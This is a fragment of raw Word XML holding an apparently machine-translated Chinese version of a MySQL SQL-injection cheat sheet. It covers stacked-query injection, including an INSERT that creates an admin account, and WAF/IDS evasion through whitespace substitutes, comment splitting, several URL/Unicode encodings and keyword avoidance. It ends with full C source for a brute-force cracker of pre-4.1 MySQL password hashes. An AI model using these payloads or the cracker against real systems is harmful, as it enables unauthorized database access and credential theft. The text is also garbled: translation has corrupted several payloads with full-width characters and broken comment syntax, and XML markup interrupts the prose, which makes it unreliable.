          <w:rFonts w:hint="default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堆叠查询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2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MySQL可以进行堆栈查询，具体取决于PHP应用程序使用哪个驱动程序与数据库进行通信。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该PDO_MYSQL驱动程序支持堆叠查询。该MySQLi（改进扩展）驱动程序还支持通过堆查询multi_query()功能。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br w:type="textWrapping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例子：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 * FROM Users WHERE ID=1 AND 1=0; INSERT INTO Users(username, password, priv) VALUES ('BobbyTables', 'kl20da$$','admin');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Fonts w:hint="default" w:eastAsia="宋体"/>
                <w:i w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="000000"/>
                <w:spacing w:val="0"/>
                <w:shd w:val="clear" w:fill="F3F3F7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 * FROM Users WHERE ID=1 AND 1=0; SHOW COLUMNS FROM Users;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsia="宋体"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:shd w:val="clear" w:fill="F3F3F7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19.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default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特定于MySQL的代码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1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MySQL允许您指定感叹号后的版本号。仅当版本大于或等于指定的版本号时，才会执行注释中的语法。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br w:type="textWrapping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例子：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UNION SELECT / *！50000 5，null;％00 * // *！40000 4，null--，* // *！30000 3，null-- x * / 0，null - +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 1 / *！41320 UNION / *！/ *！/ *！00000 SELECT / *！/ *！USER / *！（/ *！/ *！/ *！* /）;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笔记：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第一个示例返回版本;它使用一个有2列的UNION。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Fonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="000000"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:shd w:val="clear" w:fill="F3F3F7"/>
                <w:vertAlign w:val="baseline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第二个示例演示了如何绕过WAF/IDS。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20.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default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模糊和混淆</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="0"/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允许的中介人物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1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以下字符可用作空格。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53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09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水平标签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0A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新队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0B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垂直标签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0℃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新的一页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0D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回程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A0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不间断的空间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20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空间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例：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' ％0A％09 UNION ％0C SELECT ％A0 NULL ％20％23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7"/>
                <w:szCs w:val="27"/>
                <w:shd w:val="clear" w:fill="F3F3F7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括号也可用于避免使用空格。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53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28</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4153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（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29</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4153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）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例：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7"/>
                <w:szCs w:val="27"/>
                <w:shd w:val="clear" w:fill="F3F3F7"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN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UNION （ SELECT （列） FROM （表））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rPr>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:shd w:val="clear" w:fill="F3F3F7"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:shd w:val="clear" w:fill="F3F3F7"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:shd w:val="clear" w:fill="F3F3F7"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:shd w:val="clear" w:fill="F3F3F7"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:shd w:val="clear" w:fill="F3F3F7"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="0"/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AND / OR后允许的中介字符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8" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
          </w:tcPr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53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20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空间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2B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+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2D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-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7E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21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40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@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例：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 1 FROM dual WHERE 1 = 1 AND - + - + - + - + ~~（（1））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注意：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eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:b/>
                <w:bCs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dual 是一个虚拟表，可用于测试。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0"/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用评论混淆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注释可用于分解查询以欺骗WAF / IDS并避免检测。通过使用＃或 - 后跟换行符，我们可以将查询拆分为单独的行。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例：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1'# </w:t>
            </w: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AND 0-- </w:t>
            </w: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UNION# I am a comment! </w:t>
            </w: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SELECT@tmp:=table_name x FROM-- </w:t>
            </w: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br w:type="textWrapping"/>
            </w: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`information_schema`.tables LIMIT 1# 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注入的URL编码如下：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1'%23%0AAND 0--%0AUNION%23 I am a comment!%0ASELECT@tmp:=table_name x FROM--%0A`information_schema`.tables LIMIT 1%23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某些函数也可以使用注释和空格进行混淆。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-SA"/>
              </w:rPr>
              <w:t>VERSION/**/%A0 (/*comment*/)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ind w:left="0"/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编码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7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编码注射有时可用于WAF / IDS规避。</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="10"/>
              <w:tblW w:w="1673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39"/>
              <w:gridCol w:w="6087"/>
              <w:gridCol w:w="4153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9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网址编码</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="6087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SELECT％74able_％6eame FROM information_schema.tables;</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4153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</w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4153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9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双重URL编码</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="6087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SELECT％2574able_％256eame FROM information_schema.tables;</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4153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</w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4153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9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Unicode编码</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="6087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SELECT％u0074able_％u6eame FROM information_schema.tables;</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4153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</w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4153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9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无效的十六进制编码（ASP）</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="6087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SELECT％tab％le_％na％me FROM information_schema.tables;</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4153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</w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4153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ind w:left="0"/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避免关键字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4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如果IDS / WAF已阻止某些关键字，则可以通过其他方式绕过它而不使用编码。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INFORMATION_SCHEMA.TABLES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07"/>
              <w:gridCol w:w="609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7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空间</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="6099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information_schema</w:t>
                  </w:r>
                  <w:r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.table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7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反引号</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="6099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`information_schema`.`tables`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7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具体代码</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="6099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/*!information_schema.tables*/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7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替代名称</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="6099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information_schema.partitions </w:t>
                  </w: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br w:type="textWrapping"/>
                  </w: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information_schema.statistics </w:t>
                  </w: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br w:type="textWrapping"/>
                  </w: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information_schema.key_column_usage </w:t>
                  </w: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br w:type="textWrapping"/>
                  </w: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information_schema.table_constraints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注意：</w:t>
            </w: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备用名称可能取决于表中存在的PRIMARY Key。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Calibri"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:fill="F3F3F7"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Calibri"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:fill="F3F3F7"/>
        </w:rPr>
      </w:pP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21.营运商</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="9"/>
        <w:tblW w:w="8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7"/>
        <w:gridCol w:w="6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"http://dev.mysql.com/doc/refman/5.6/en/logical-operators.html" \l "operator_and"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AND ， &amp;&amp;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逻辑和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"http://dev.mysql.com/doc/refman/5.6/en/assignment-operators.html" \l "operator_assign-equal"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=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分配值（作为语句的一部分，或作为语句中子句的一部分 ）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"http://dev.mysql.com/doc/refman/5.6/en/set-statement.html"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 SET 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SET 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"http://dev.mysql.com/doc/refman/5.6/en/update.html"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UPDATE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"http://dev.mysql.com/doc/refman/5.6/en/assignment-operators.html" \l "operator_assign-value"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:=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分配值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"http://dev.mysql.com/doc/refman/5.6/en/comparison-operators.html" \l "operator_between"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BETWEEN ... AND ...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检查值是否在值范围内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"http://dev.mysql.com/doc/refman/5.6/en/cast-functions.html" \l "operator_binary"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BINARY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将字符串转换为二进制字符串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"http://dev.mysql.com/doc/refman/5.6/en/bit-functions.html" \l "operator_bitwise-and"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&amp;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按位AND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"http://dev.mysql.com/doc/refman/5.6/en/bit-functions.html" \l "operator_bitwise-invert"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~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反转位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"http://dev.mysql.com/doc/refman/5.6/en/bit-functions.html" \l "operator_bitwise-or"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|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按位OR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"http://dev.mysql.com/doc/refman/5.6/en/bit-functions.html" \l "operator_bitwise-xor"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^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按位异或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"http://dev.mysql.com/doc/refman/5.6/en/control-flow-functions.html" \l "operator_case"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CASE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案例运营商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"http://dev.mysql.com/doc/refman/5.6/en/arithmetic-functions.html" \l "operator_div"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DIV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整数除法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"http://dev.mysql.com/doc/refman/5.6/en/arithmetic-functions.html" \l "operator_divide"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/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分部运营商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"http://dev.mysql.com/doc/refman/5.6/en/comparison-operators.html" \l "operator_equal-to"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&lt;=&gt;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NULL-safe等于运算符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"http://dev.mysql.com/doc/refman/5.6/en/comparison-operators.html" \l "operator_equal"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=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平等的运营商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"http://dev.mysql.com/doc/refman/5.6/en/comparison-operators.html" \l "operator_greater-than-or-equal"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&gt;=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大于或等于运营商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"http://dev.mysql.com/doc/refman/5.6/en/comparison-operators.html" \l "operator_greater-than"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&gt;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大于运营商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"http://dev.mysql.com/doc/refman/5.6/en/comparison-operators.html" \l "operator_is-not-null"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IS NOT NULL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NOT NULL值测试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"http://dev.mysql.com/doc/refman/5.6/en/comparison-operators.html" \l "operator_is-not"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IS NOT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针对布尔值测试值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"http://dev.mysql.com/doc/refman/5.6/en/comparison-operators.html" \l "operator_is-null"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IS NULL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NULL值测试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"http://dev.mysql.com/doc/refman/5.6/en/comparison-operators.html" \l "operator_is"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IS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针对布尔值测试值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"http://dev.mysql.com/doc/refman/5.6/en/bit-functions.html" \l "operator_left-shift"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&lt;&lt;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左移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"http://dev.mysql.com/doc/refman/5.6/en/comparison-operators.html" \l "operator_less-than-or-equal"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&lt;=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小于或等于运营商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"http://dev.mysql.com/doc/refman/5.6/en/comparison-operators.html" \l "operator_less-than"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&lt;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不到运营商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"http://dev.mysql.com/doc/refman/5.6/en/string-comparison-functions.html" \l "operator_like"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LIKE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简单的模式匹配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"http://dev.mysql.com/doc/refman/5.6/en/arithmetic-functions.html" \l "operator_minus"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-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减号运算符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"http://dev.mysql.com/doc/refman/5.6/en/arithmetic-functions.html" \l "operator_mod"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% or MOD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模数运算符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"http://dev.mysql.com/doc/refman/5.6/en/comparison-operators.html" \l "operator_not-between"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NOT BETWEEN ... AND ...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检查值是否不在值范围内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"http://dev.mysql.com/doc/refman/5.6/en/comparison-operators.html" \l "operator_not-equal"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!= ， &lt;&gt;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不等于运营商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"http://dev.mysql.com/doc/refman/5.6/en/string-comparison-functions.html" \l "operator_not-like"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NOT LIKE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简单模式匹配的否定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"http://dev.mysql.com/doc/refman/5.6/en/regexp.html" \l "operator_not-regexp"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NOT REGEXP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REGEXP的否定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"http://dev.mysql.com/doc/refman/5.6/en/logical-operators.html" \l "operator_not"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NOT ， !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否定价值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"http://dev.mysql.com/doc/refman/5.6/en/logical-operators.html" \l "operator_or"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|| ， OR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逻辑或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"http://dev.mysql.com/doc/refman/5.6/en/arithmetic-functions.html" \l "operator_plus"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+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加法运算符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"http://dev.mysql.com/doc/refman/5.6/en/regexp.html" \l "operator_regexp"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REGEXP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使用正则表达式匹配模式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"http://dev.mysql.com/doc/refman/5.6/en/bit-functions.html" \l "operator_right-shift"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&gt;&gt;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"http://dev.mysql.com/doc/refman/5.6/en/regexp.html" \l "operator_regexp"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RLIKE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REGEXP的同义词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"http://dev.mysql.com/doc/refman/5.6/en/string-functions.html" \l "operator_sounds-like"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SOUNDS LIKE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比较声音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"http://dev.mysql.com/doc/refman/5.6/en/arithmetic-functions.html" \l "operator_times"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*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乘法运算符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"http://dev.mysql.com/doc/refman/5.6/en/arithmetic-functions.html" \l "operator_unary-minus"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-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更改参数的符号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instrText xml:space="preserve"> HYPERLINK "http://dev.mysql.com/doc/refman/5.6/en/logical-operators.html" \l "operator_xor" \t "https://websec.ca/kb/_blank" </w:instrTex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XOR</w:t>
            </w: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6199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逻辑异或</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Calibri"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:fill="F3F3F7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22.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default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常量</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="9"/>
        <w:tblW w:w="14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当前用户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null，\ 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真假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23.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default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密码哈希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在MySQL 4.1之前，由PASSWORD（）函数计算的密码哈希长度为16个字节。这样的哈希看起来像这样：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53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PASSWORD('mypass')</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4153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6f8c114b58f2ce9e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  <w:r>
              <w:rPr>
                <w:rStyle w:val="13"/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从MySQL 4.1开始，PASSWORD（）函数已被修改为产生更长的41字节哈希值：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53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tbl>
                  <w:tblPr>
                    <w:tblStyle w:val="9"/>
                    <w:tblW w:w="8640" w:type="dxa"/>
                    <w:tblInd w:w="-6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864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8640" w:type="dxa"/>
                        <w:tcBorders>
                          <w:top w:val="single" w:color="D5D5D5" w:sz="6" w:space="0"/>
                          <w:left w:val="single" w:color="D5D5D5" w:sz="6" w:space="0"/>
                          <w:bottom w:val="single" w:color="D5D5D5" w:sz="6" w:space="0"/>
                          <w:right w:val="single" w:color="D5D5D5" w:sz="6" w:space="0"/>
                        </w:tcBorders>
                        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                        <w:tcMar>
                          <w:top w:w="105" w:type="dxa"/>
                          <w:left w:w="75" w:type="dxa"/>
                          <w:bottom w:w="105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ind w:left="0"/>
                          <w:jc w:val="left"/>
                          <w:rPr>
                            <w:rStyle w:val="13"/>
                            <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                            <w:i w:val="0"/>
                            <w:caps w:val="0"/>
                            <w:color w:val="222222"/>
                            <w:spacing w:val="0"/>
                            <w:kern w:val="0"/>
                            <w:sz w:val="28"/>
                            <w:szCs w:val="28"/>
                            <w:shd w:val="clear" w:fill="FFFFFF"/>
                            <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="13"/>
                            <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                            <w:i w:val="0"/>
                            <w:caps w:val="0"/>
                            <w:color w:val="222222"/>
                            <w:spacing w:val="0"/>
                            <w:kern w:val="0"/>
                            <w:sz w:val="28"/>
                            <w:szCs w:val="28"/>
                            <w:shd w:val="clear" w:fill="FFFFFF"/>
                            <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
                          </w:rPr>
                          <w:t>PASSWORD('mypass')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</w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4153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/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rStyle w:val="13"/>
                      <w:rFonts w:hint="eastAsia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</w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rStyle w:val="13"/>
                      <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                      <w:i w:val="0"/>
                      <w:caps w:val="0"/>
                      <w:color w:val="222222"/>
                      <w:spacing w:val="0"/>
                      <w:kern w:val="0"/>
                      <w:sz w:val="28"/>
                      <w:szCs w:val="28"/>
                      <w:shd w:val="clear" w:fill="FFFFFF"/>
                      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
                    </w:rPr>
                    <w:t>*6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4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</w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/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24.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi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  <w:t>密码破解</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:i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Cain＆Abel和John the Ripper都能够破解MySQL 3.x-6.x密码。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:i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13"/>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:i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可以在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:i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Style w:val="13"/>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:i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"http://www.metasploit.com/modules/auxiliary/analyze/jtr_mysql_fast" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:i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宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:i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此处</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:i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Style w:val="13"/>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:i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找到JTR的Metasploit模块。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="0"/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MySQL &lt;4.1密码破解程序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7" w:hRule="atLeast"/>
        </w:trPr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>/ *此程序属于公共领域</w:t>
            </w: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  <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>和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>分享。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*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>*示例：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* $ gcc -O2 -fomit-frame-pointer MySQLfast.c -o MySQLfast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* $ MySQLfast 6294b50f67eda209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*哈希：6294b50f67eda209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*尝试长度3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*尝试长度4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*找到传递：barf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*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>* MySQL密码哈希函数可以通过以下方式大大加强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>*</w:t>
            </w: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  <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> 例如：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  <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">*  -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>对密码进行两次传递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>*  - 使用按位旋转而不是左移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>*  - 导致更多算术溢出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* /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>#include &lt;stdio.h&gt;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>typedef unsigned long u32;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/ *密码允许的字符; 33-126是可打印的ascii * /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>#define MIN_CHAR 33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#define MAX_CHAR 126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/ *密码的最大长度* /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>#define MAX_LEN 12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>#define MASK 0x7fffffffL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>int crack0(int stop, u32 targ1, u32 targ2, int *pass_ary)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>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int i, c;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u32 d, e, sum, step, diff, div, xor1, xor2, state1, state2;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u32 newstate1, newstate2, newstate3;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u32 state1_ary[MAX_LEN-2], state2_ary[MAX_LEN-2];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u32 xor_ary[MAX_LEN-3], step_ary[MAX_LEN-3];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i = -1;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sum = 7;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state1_ary[0] = 1345345333L;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state2_ary[0] = 0x12345671L;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while (1)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while (i &lt; stop)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i++;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pass_ary[i] = MIN_CHAR;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step_ary[i] = (state1_ary[i] &amp; 0x3f) + sum;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xor_ary[i] = step_ary[i]*MIN_CHAR + (state1_ary[i] &lt;&lt; 8);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sum += MIN_CHAR;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state1_ary[i+1] = state1_ary[i] ^ xor_ary[i];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state2_ary[i+1] = state2_ary[i]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  + ((state2_ary[i] &lt;&lt; 8) ^ state1_ary[i+1]);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state1 = state1_ary[i+1];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state2 = state2_ary[i+1];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step = (state1 &amp; 0x3f) + sum;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xor1 = step*MIN_CHAR + (state1 &lt;&lt; 8);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xor2 = (state2 &lt;&lt; 8) ^ state1;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for (c = MIN_CHAR; c &lt;= MAX_CHAR; c++, xor1 += step)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newstate2 = state2 + (xor1 ^ xor2);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newstate1 = state1 ^ xor1;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newstate3 = (targ2 - newstate2) ^ (newstate2 &lt;&lt; 8);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div = (newstate1 &amp; 0x3f) + sum + c;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diff = ((newstate3 ^ newstate1) - (newstate1 &lt;&lt; 8)) &amp; MASK;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if (diff % div != 0) continue;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d = diff / div;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if (d &lt; MIN_CHAR || d &gt; MAX_CHAR) continue;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div = (newstate3 &amp; 0x3f) + sum + c + d;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diff = ((targ1 ^ newstate3) - (newstate3 &lt;&lt; 8)) &amp; MASK;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if (diff % div != 0) continue;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e = diff / div;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if (e &lt; MIN_CHAR || e &gt; MAX_CHAR) continue;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pass_ary[i+1] = c;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pass_ary[i+2] = d;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pass_ary[i+3] = e;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return 1;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while (i &gt;= 0 &amp;&amp; pass_ary[i] &gt;= MAX_CHAR)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sum -= MAX_CHAR;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i--;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if (i &lt; 0) break;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pass_ary[i]++;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xor_ary[i] += step_ary[i];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sum++;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state1_ary[i+1] = state1_ary[i] ^ xor_ary[i];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state2_ary[i+1] = state2_ary[i]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+ ((state2_ary[i] &lt;&lt; 8) ^ state1_ary[i+1]);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return 0;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>void crack(char *hash)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>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int i, len;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u32 targ1, targ2, targ3;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int pass[MAX_LEN];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if ( sscanf(hash, "%8lx%lx", &amp;targ1, &amp;targ2) != 2 )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printf("Invalid password hash: %s\n", hash);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return;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printf("Hash: %08lx%08lx\n", targ1, targ2);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targ3 = targ2 - targ1;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targ3 = targ2 - ((targ3 &lt;&lt; 8) ^ targ1);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targ3 = targ2 - ((targ3 &lt;&lt; 8) ^ targ1);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targ3 = targ2 - ((targ3 &lt;&lt; 8) ^ targ1);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for (len = 3; len &lt;= MAX_LEN; len++)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printf("Trying length %d\n", len);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if ( crack0(len-4, targ1, targ3, pass) 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printf("Found pass: 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for (i = 0; i &lt; len; i++)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  putchar(pass[i]);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putchar('\n');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  break;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if (len &gt; MAX_LEN)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printf("Pass not found\n");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>int main(int argc, char *argv[])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>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int i;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if (argc &lt;= 1)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printf("usage: %s hash\n", argv[0]);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for (i = 1; i &lt; argc; i++)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  crack(argv[i]);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 xml:space="preserve">  return 0;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Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman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hd w:val="clear" w:fill="FFFFFF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24688"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="4D424688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65E2E"/>
    <w:rsid w:val="046949C2"/>
    <w:rsid w:val="054123C9"/>
    <w:rsid w:val="05B31BBD"/>
    <w:rsid w:val="06633E83"/>
    <w:rsid w:val="079579AA"/>
    <w:rsid w:val="09963B46"/>
    <w:rsid w:val="0D0F1B97"/>
    <w:rsid w:val="0DF052AB"/>
    <w:rsid w:val="0E165704"/>
    <w:rsid w:val="10165E2E"/>
    <w:rsid w:val="10E307CF"/>
    <w:rsid w:val="11DB0352"/>
    <w:rsid w:val="137046FE"/>
    <w:rsid w:val="17F86F1F"/>
    <w:rsid w:val="1CAE0B86"/>
    <w:rsid w:val="206936E3"/>
    <w:rsid w:val="20EE1B51"/>
    <w:rsid w:val="22D43E0A"/>
    <w:rsid w:val="24327724"/>
    <w:rsid w:val="246240BC"/>
    <w:rsid w:val="25724BCB"/>
    <w:rsid w:val="26917700"/>
    <w:rsid w:val="28A30183"/>
    <w:rsid w:val="2A923B9F"/>
    <w:rsid w:val="2AB0225E"/>
    <w:rsid w:val="2BA130DE"/>
    <w:rsid w:val="2D041D3F"/>
    <w:rsid w:val="2D2717C7"/>
    <w:rsid w:val="2DA71058"/>
    <w:rsid w:val="2F987BAA"/>
    <w:rsid w:val="3083317F"/>
    <w:rsid w:val="31867980"/>
    <w:rsid w:val="325F21BD"/>
    <w:rsid w:val="32A21D66"/>
    <w:rsid w:val="32F3783D"/>
    <w:rsid w:val="336F5D0B"/>
    <w:rsid w:val="33D323AF"/>
    <w:rsid w:val="37162ACB"/>
    <w:rsid w:val="37597F35"/>
    <w:rsid w:val="37887E95"/>
    <w:rsid w:val="3A607FEE"/>
    <w:rsid w:val="3A873586"/>
    <w:rsid w:val="3C294130"/>
    <w:rsid w:val="3F99216C"/>
    <w:rsid w:val="41777F36"/>
    <w:rsid w:val="418D053E"/>
    <w:rsid w:val="41D57BE2"/>
    <w:rsid w:val="41DE785E"/>
    <w:rsid w:val="43F64B36"/>
    <w:rsid w:val="46B10063"/>
    <w:rsid w:val="46D85FCB"/>
    <w:rsid w:val="4A543302"/>
    <w:rsid w:val="4BDE4555"/>
    <w:rsid w:val="4C0C7527"/>
    <w:rsid w:val="4C3B3230"/>
    <w:rsid w:val="4E2952DE"/>
    <w:rsid w:val="4FDF40B4"/>
    <w:rsid w:val="50B80D70"/>
    <w:rsid w:val="50BA3194"/>
